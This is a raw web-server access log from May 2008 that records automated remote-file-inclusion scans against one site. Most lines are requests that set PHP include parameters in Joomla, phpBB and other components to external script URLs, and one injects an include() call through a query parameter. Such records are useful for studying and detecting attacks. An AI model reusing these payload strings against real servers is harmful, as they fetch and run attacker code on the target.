213.246.61.4 - - [05/May/2008:09:44:36 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [05/May/2008:09:44:37 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [05/May/2008:09:44:38 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.49.246 - - [05/May/2008:09:44:51 -0700] "GET /logs/access_080312.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.143.49.246 - - [05/May/2008:09:44:51 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.143.49.246 - - [05/May/2008:09:44:51 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.209.247.35 - - [05/May/2008:09:44:57 -0700] "GET //index1.php?site=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
147.46.222.74 - - [05/May/2008:09:45:06 -0700] "GET /logs/access_080210.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.46.222.74 - - [05/May/2008:09:45:06 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.46.222.74 - - [05/May/2008:09:45:06 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.141.39.30 - - [05/May/2008:09:45:24 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.39.30 - - [05/May/2008:09:45:25 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.39.30 - - [05/May/2008:09:45:25 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
205.234.138.144 - - [05/May/2008:09:45:32 -0700] "GET /logs/access_080218.log/Ultrastats/include/functions_common.php?gl_root_path=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.115.213.123 - - [05/May/2008:09:45:34 -0700] "GET /logs/access_080214.log//admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.123 - - [05/May/2008:09:45:34 -0700] "GET //admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.123 - - [05/May/2008:09:45:35 -0700] "GET /logs//admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:09:45:38 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:09:45:38 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.213.123 - - [05/May/2008:09:45:44 -0700] "GET /logs/access_080214.log//admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.123 - - [05/May/2008:09:45:44 -0700] "GET //admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.123 - - [05/May/2008:09:45:45 -0700] "GET /logs//admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.16.29.227 - - [05/May/2008:09:45:56 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.29.227 - - [05/May/2008:09:45:57 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:09:46:16 -0700] "GET /logs/access.log/index.php?pag=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.91.246.64 - - [05/May/2008:09:46:16 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://statesidelogistics.com/images/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.36.154.122 - - [05/May/2008:09:46:20 -0700] "GET /logs/access_080218.log//components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.209.247.35 - - [05/May/2008:09:46:25 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.73.146.54 - - [05/May/2008:09:46:29 -0700] "GET /logs/access_080215.log//index.php?option=com_custompages&cpage=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [05/May/2008:09:46:32 -0700] "GET //index.php?option=com_custompages&cpage=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [05/May/2008:09:46:32 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.213.78.87 - - [05/May/2008:09:47:07 -0700] "GET //index1.php?site=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.39.30 - - [05/May/2008:09:47:16 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.11.108.130 - - [05/May/2008:09:47:27 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.11.108.130 - - [05/May/2008:09:47:31 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.42 - - [05/May/2008:09:47:42 -0700] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [05/May/2008:09:47:44 -0700] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
89.111.176.126 - - [05/May/2008:09:47:46 -0700] "GET /logs/access_080215.log//content.php?inc=http://sales.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.126 - - [05/May/2008:09:47:46 -0700] "GET /logs/access_080215.log//content.php?inc=http://sales.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.126 - - [05/May/2008:09:47:46 -0700] "GET //content.php?inc=http://sales.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.126 - - [05/May/2008:09:47:46 -0700] "GET //content.php?inc=http://sales.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.126 - - [05/May/2008:09:47:47 -0700] "GET /logs//content.php?inc=http://sales.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.126 - - [05/May/2008:09:47:47 -0700] "GET /logs//content.php?inc=http://sales.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.61.90 - - [05/May/2008:09:47:52 -0700] "GET /logs/access_080124.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [05/May/2008:09:47:53 -0700] "GET /logs/access_080124.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [05/May/2008:09:47:54 -0700] "GET /logs/access_071219.log/errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [05/May/2008:09:47:54 -0700] "GET /errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [05/May/2008:09:47:54 -0700] "GET /logs/access_071219.log/errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [05/May/2008:09:47:55 -0700] "GET /errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [05/May/2008:09:47:55 -0700] "GET /logs/errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.151.23.213 - - [05/May/2008:09:47:55 -0700] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.61.90 - - [05/May/2008:09:47:55 -0700] "GET /logs/errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.151.23.213 - - [05/May/2008:09:47:55 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.61.90 - - [05/May/2008:09:47:59 -0700] "GET /logs/access_080124.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [05/May/2008:09:48:02 -0700] "GET /logs/access_071219.log/errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [05/May/2008:09:48:02 -0700] "GET /errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [05/May/2008:09:48:02 -0700] "GET /logs/errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.29.7.12 - - [05/May/2008:09:48:07 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "holmes/3.12.2 (http://morfeo.centrum.cz/bot)" "www.dmulk.com"
66.249.70.117 - - [05/May/2008:09:48:20 -0700] "GET /blog/wp-login.php?action=lostpassword HTTP/1.1" 200 1722 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
189.236.5.128 - - [05/May/2008:09:48:29 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [05/May/2008:09:48:37 -0700] "GET /logs/access_080215.log//index.php?option=com_custompages&cpage=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [05/May/2008:09:48:38 -0700] "GET //index.php?option=com_custompages&cpage=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [05/May/2008:09:48:38 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.218.137.36 - - [05/May/2008:09:48:53 -0700] "GET /logs/access.log/index.php?pag=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.218.137.36 - - [05/May/2008:09:48:54 -0700] "GET /index.php?pag=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
213.218.137.36 - - [05/May/2008:09:48:54 -0700] "GET /logs/index.php?pag=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.91.118.150 - - [05/May/2008:09:49:00 -0700] "GET /logs/access.log/index.php?pag=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.116.44.60 - - [05/May/2008:09:49:10 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [05/May/2008:09:49:10 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [05/May/2008:09:49:10 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [05/May/2008:09:49:10 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [05/May/2008:09:49:10 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [05/May/2008:09:49:10 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [05/May/2008:09:49:10 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [05/May/2008:09:49:10 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [05/May/2008:09:49:10 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [05/May/2008:09:49:10 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [05/May/2008:09:49:10 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [05/May/2008:09:49:11 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.246.51.45 - - [05/May/2008:09:49:14 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [05/May/2008:09:49:14 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.151.23.213 - - [05/May/2008:09:49:19 -0700] "GET /logs/access_080112.log//modules/xfsection/modify.php?dir_module=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
147.46.222.74 - - [05/May/2008:09:49:38 -0700] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.202.88.113 - - [05/May/2008:09:49:57 -0700] "GET /logs/access_080205.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.202.88.113 - - [05/May/2008:09:50:02 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.811" "www.dmulk.com"
193.202.88.113 - - [05/May/2008:09:50:02 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.93.56.80 - - [05/May/2008:09:50:05 -0700] "GET /plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://finkel.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
96.52.36.19 - - [05/May/2008:09:50:10 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
96.52.36.19 - - [05/May/2008:09:50:10 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.218.85.18 - - [05/May/2008:09:50:31 -0700] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [05/May/2008:09:50:32 -0700] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
221.143.49.246 - - [05/May/2008:09:50:39 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.143.49.246 - - [05/May/2008:09:50:40 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.143.49.246 - - [05/May/2008:09:50:40 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.143.49.246 - - [05/May/2008:09:50:49 -0700] "GET /logs/access_080218.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:51:25 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:51:27 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:51:28 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:51:31 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:51:32 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:51:34 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
217.23.154.168 - - [05/May/2008:09:51:48 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.drakeforge.net/robo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
217.23.154.168 - - [05/May/2008:09:51:48 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.drakeforge.net/robo.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
221.143.49.246 - - [05/May/2008:09:51:49 -0700] "GET /logs/access_080315.log//admin/business_inc/saveserver.php?thisdir=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.113.24.154 - - [05/May/2008:09:51:50 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [05/May/2008:09:51:50 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [05/May/2008:09:51:51 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [05/May/2008:09:51:51 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [05/May/2008:09:51:51 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [05/May/2008:09:51:51 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
209.47.165.69 - - [05/May/2008:09:52:09 -0700] "GET //oneadmin/config.php?path%5Bdocroot%5D=http://trosken.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
209.47.165.69 - - [05/May/2008:09:52:09 -0700] "GET /logs//oneadmin/config.php?path%5Bdocroot%5D=http://trosken.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
212.113.24.154 - - [05/May/2008:09:52:10 -0700] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [05/May/2008:09:52:10 -0700] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
213.246.51.45 - - [05/May/2008:09:52:13 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.105.42 - - [05/May/2008:09:52:13 -0700] "GET /logs/access_080215.log//index.php?option=com_custompages&cpage=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:52:13 -0700] "GET /logs/access_080312.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
216.146.70.18 - - [05/May/2008:09:52:15 -0700] "GET //login.php?dir=http://www.dlkownz.com/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:52:17 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
